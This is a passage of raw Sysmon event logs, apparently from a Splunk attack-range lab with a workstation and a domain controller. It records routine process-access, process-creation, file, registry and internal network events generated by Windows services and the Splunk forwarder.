Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221785Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221784Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221783Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221782Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221781Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221780Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221779Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221778Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221777Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221776Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:51.259{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-181B-6216-2305-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221775Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:51.259{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-181B-6216-2305-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221774Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:51.260{4F8D34B0-181B-6216-2305-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221773Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:51.228{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=193B08295795EF0F6F8643D8B047D1A3,SHA256=918D94F449D131BBB625DEB0DCBC08DE9459D155C18E9875D9CE1FC97104E968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:52.342{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ABFCA1DA2CF847A8DA4D2A6C23DC110,SHA256=D67B0A1854DF20B648FFD8CCCD245CC8EE84EBBD9D19FFD1F3FFC7FBA05214E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221788Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:52.274{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABE02116AD9D412DB0A385714BDBEA43,SHA256=A57A65D0AB4253E06BB1AB427B658F2BBC0EA59C5D086A82A7D1CD2582154133,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221787Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:52.274{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4AB168ED3699BCBC7A3AEE78A82F4270,SHA256=0F1DA646D8638CA8A7ACCD396273EC06CE717172B4854213F9D14DE975CACF52,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000297854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:18:53.725{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6FC0DF5C-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6FC0DF5C-0000-0000-0000-100000000000.XML 13241300x8000000000000000297853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:18:53.725{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Config SourceDWORD (0x00000001) 13241300x8000000000000000297852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:18:53.725{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_BA30863B-E0B8-488B-829D-A0E9DE6AE59C.XML 10341000x8000000000000000297851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:53.690{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:53.689{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:53.373{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B961770B6A66858E3D1B4BCD09A75D1,SHA256=3197483F4756B319BB9CB1D4FCB185318883EB2DD12920786C2512F8E684E188,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221789Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:53.321{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FA29058F346BA130F25E93AAB4A14CB,SHA256=8DF84CFED9F192569AD953627C2D3DAA62DD53384863EAD079227BA0980DBC41,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:51.646{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49487-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000297858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:54.572{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:54.572{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:54.572{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:54.394{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23D596DF5A6E3B4901A05C7936CF2C25,SHA256=75DFAEC6E6E764556A0681568B6EA614C36B7379143158818A05F3CA22506545,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221790Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:54.556{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D79A903AE83B998406D2BA7786D206A6,SHA256=C336EAB7316578CB4B3B027F92D4FFD073409D1CCA8D30A3C06D3533339F455E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221792Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:53.570{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51672-false10.0.1.12-8000- 23542300x8000000000000000221791Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:55.790{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DBD0A4EAED65C6AB4C226FC98E78C1E,SHA256=97A2F7548BA1DE6C4B87FFFE09FE56F56D869382178EA9AA47C9FE5A65F44929,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:53.220{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:c830:d833:fbf:ffff-56957-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000297868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:53.220{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local56957-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000297867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:53.165{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 